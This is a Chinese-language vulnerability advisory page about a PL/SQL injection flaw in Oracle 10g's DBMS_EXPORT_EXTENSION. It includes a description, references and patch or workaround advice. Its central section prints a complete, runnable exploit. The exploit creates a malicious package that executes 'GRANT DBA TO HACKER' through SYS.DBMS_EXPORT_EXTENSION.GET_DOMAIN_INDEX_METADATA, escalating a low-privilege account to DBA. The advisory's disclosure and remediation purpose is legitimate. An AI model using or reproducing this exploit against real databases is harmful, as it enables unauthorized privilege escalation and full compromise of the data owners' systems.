Oracle 10g DBMS_EXPORT_EXTENSION存储过程远程SQL注入漏洞

| 网站首页 | 模板 | 资料 | 源码 | 工具 | 开发 | 设计 | 安全 | 项目 | 网络 | 图片 | 系统 | 数据库 | 博客 | 会员中心 | 小说 |

网络学院

学习资料

源码模版

您现在的位置：精品下载 >> 安全 >> 网络安全 >> 安全中心正文

用户登录

新用户注册

Oracle 10g DBMS_EXPORT_EXTENSION存储过程远程SQL注入漏洞

【字体：小大】

Oracle 10g DBMS_EXPORT_EXTENSION存储过程远程SQL注入漏洞

作者：佚名安全中心来源：不详点击数：更新时间：2007-10-10

涉及程序：
Oracle 10g DBMS_EXPORT_EXTENSION

描述：
Oracle 10g DBMS_EXPORT_EXTENSION存储过程远程SQL注入漏洞

详细：
Oracle是一款大型的商业数据库系统。

Oracle 10g中由SYS用户运行的DBMS_EXPORT_EXTENSION存储过程存在PL/SQL注入漏洞，允许低权限用户以DBA权限执行任意SQL代码。

Oracle声称已在2006年4月的紧急补丁更新中修复了这个漏洞，但实际上并未修复。

<*来源：David Litchfield （david@nextgenss.com）

链接：（http://marc.theaimsgroup.com/?l=bugtraq&m=114606418904385&w=2
　　（http://marc.theaimsgroup.com/?l=bugtraq&m=114546055109559&w=2
　　（http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html?_template=/o
*>

受影响系统：
Oracle Oracle10g 10.2.0.2.0

攻击方法：
警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
　RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
　EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
　COMMIT;
　RETURN(1);
END;

END;
/

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
VERSION := '10.2.0.2.0'; GMFLAGS := 1;

v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
　INDEX_NAME => INDEX_NAME,　 INDEX_SCHEMA => INDEX_SCHEMA,　 TYPE_NAME
=> TYPE_NAME,
　TYPE_SCHEMA => TYPE_SCHEMA,　 VERSION => VERSION,　 NEWBLOCK =>
NEWBLOCK,　 GMFLAGS => GMFLAGS
　　　);
END;
/

解决方案：
临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 删除DBMS_EXPORT_EXTENSION的PUBLIC执行权限。

厂商补丁：

Oracle
------
Oracle已经为此发布了一个安全公告（cpujul2006）以及相应补丁:
cpujul2006：Oracle Critical Patch Update - July 2006
链接：（http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html?_template=/o

安全中心录入：chqnet 责任编辑：chqnet

上一个安全中心： Oracle 2006年7月更新修复多个安全漏洞

下一个安全中心： MySQL Server date_format()拒绝服务漏洞

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关安全中心
				NTFS文件流与WinRAR联手打造… 保护好我的系统拒绝WinRAR密… 解析来自Autorun.inf文件的攻… worm.viking（维金）病毒清除… U盘病毒和Autorun.inf文件分… iexplore.exe是进程还是病毒用Autoruns揪出流氓软件的驱… 对Autorun.inf类病毒的攻防经… 如何面对MAC地址被过滤快速有效的iFrame漏洞解决方…

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）